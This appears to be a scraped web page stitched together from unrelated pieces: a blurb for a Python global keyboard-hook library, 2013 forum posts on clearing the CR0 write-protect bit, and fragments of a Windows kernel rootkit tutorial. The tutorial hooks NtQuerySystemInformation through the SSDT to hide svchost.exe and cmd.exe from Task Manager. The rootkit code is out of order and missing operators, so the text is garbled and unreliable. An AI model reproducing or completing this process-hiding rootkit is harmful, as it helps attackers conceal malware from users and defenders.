Trivial to install and deploy, just copy the files. Works with Windows and Linux (requires sudo), with experimental OS X support (thanks Pure Python, no C modules to be compiled. Global event hook on all keyboards (captures keys regardless of focus). Hook global events, register hotkeys, simulate key presses and much more. Take full control of your keyboard with this small Python library. It works for many cases, and I wish to pick it up again in the future, but you might encounter some friction and limited features using it. Windows 7 Professional Base System x64 Remotely debugging Windows 7 Professional VM w/kd. This project is currently unmaintained. I found a cool command, thought I'd share it. lol. Edited by Bit_Hacker, 14 September 2013 - 10:48 PM. So there are 12 items missing from the structure. Seems like the structure is bigger than the one you have in your zip file. I'm not sure how many bytes a LARGE_INTEGER is nor a ULONG. But they look different at first glance. BYTE Reserved1 -> that's 13 DWORDS ( 4 bytes * 13 = 52 bytes ) typedef struct _SYSTEM_PROCESS_INFORMATION SYSTEM_PROCESS_INFO,*PSYSTEM_PROCESS_INFO Just noticed your SYSTEM_PROCESS_INFORMATION structure isn't 100% complete. If write protection is enabled, and you attempt to hook the SSDT, the system will crash. The code above is used to disable the memory write protection, because the SSDT can be write protected. I take it this enables the CPU to write to read-only memory pages, right? It states the 16th bit is: 16 WP Write protect Determines whether the CPU can write to pages marked read-only If the above is true, I guess I don't need to know what the cr0 value is. Someone let me know if I have this right? By using the logical "NOT" before the "AND" makes it so that bit will never be 1. So the only way the code above changes the 16th bit. If we assume the cr0 register is all 0, which in this case it won't be. If you read the above from right to left.
What I don't understand is what is the cr0 value that goes into eax before the logical "AND"? The whole code here that makes this work is this part right here. 047 KeServiceDescriptorTable->ServiceTableBase=(ULONG)Hook It allows you to create powerful kernel mode rootkits that can hide and protect processes, files, etc. To install the driver, open the install.bat batch file. NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject,PUNICODE_STRING pRegistryPath) fnNtQuerySystemInformation=Hook(*(PULONG)((PUCHAR)ZwQuerySystemInformation 1),HookNtQuerySystemInformation) DbgPrint("NtQuerySystemInformation address: %#x\n",fnNtQuerySystemInformation) Hook(*(PULONG)((PUCHAR)ZwQuerySystemInformation 1),fnNtQuerySystemInformation) void Unload(PDRIVER_OBJECT pDriverObject) if(!wcscmp(L"cmd.exe",pNext->ImageName.Buffer)) pCurr->NextEntryOffset =pNext->NextEntryOffset if(!wcscmp(L"svchost.exe",pNext->ImageName.Buffer)) pNext=(PSYSTEM_PROCESS_INFO)((PUCHAR)pCurr pCurr->NextEntryOffset) ret=fnNtQuerySystemInformation(InfoClass,Buffer,Length,ReturnLength) return fnNtQuerySystemInformation(InfoClass,Buffer,Length,ReturnLength) NTSTATUS HookNtQuerySystemInformation(ULONG InfoClass,PVOID Buffer,ULONG Length,PULONG ReturnLength) KeServiceDescriptorTable->ServiceTableBase=(ULONG)Hook OrigAddress=(PVOID)KeServiceDescriptorTable->ServiceTableBase PVOID Hook(ULONG ServiceNumber,PVOID Hook) pNtQuerySystemInformation fnNtQuerySystemInformation NTSYSAPI NTSTATUS NTAPI ZwQuerySystemInformation(ULONG,PVOID,ULONG,PULONG) typedef NTSTATUS (*pNtQuerySystemInformation)(ULONG,PVOID,ULONG,PULONG) extern PKSERVICE_DESCRIPTOR_TABLE KeServiceDescriptorTable }SYSTEM_PROCESS_INFO,*PSYSTEM_PROCESS_INFO }KSERVICE_DESCRIPTOR_TABLE,*PKSERVICE_DESCRIPTOR_TABLE typedef struct _KSERVICE_DESCRIPTOR_TABLE The hook will hide all running svchost.exe and cmd.exe processes. A kernel mode driver is used to hook the SSDT. In this example, I will hook the NtQuerySystemInformation function with SSDT hooking.
When you open Task Manager, you see the list of running processes. This list is queried by calling the NtQuerySystemInformation function. When this function is called with the SystemProcessInformation (5) information class, the function returns a data structure that contains the running process list. By modifying this data structure, we can hide running processes from Task Manager or any other program. With the NtQuerySystemInformation hook, we can modify the data structure and hide running processes.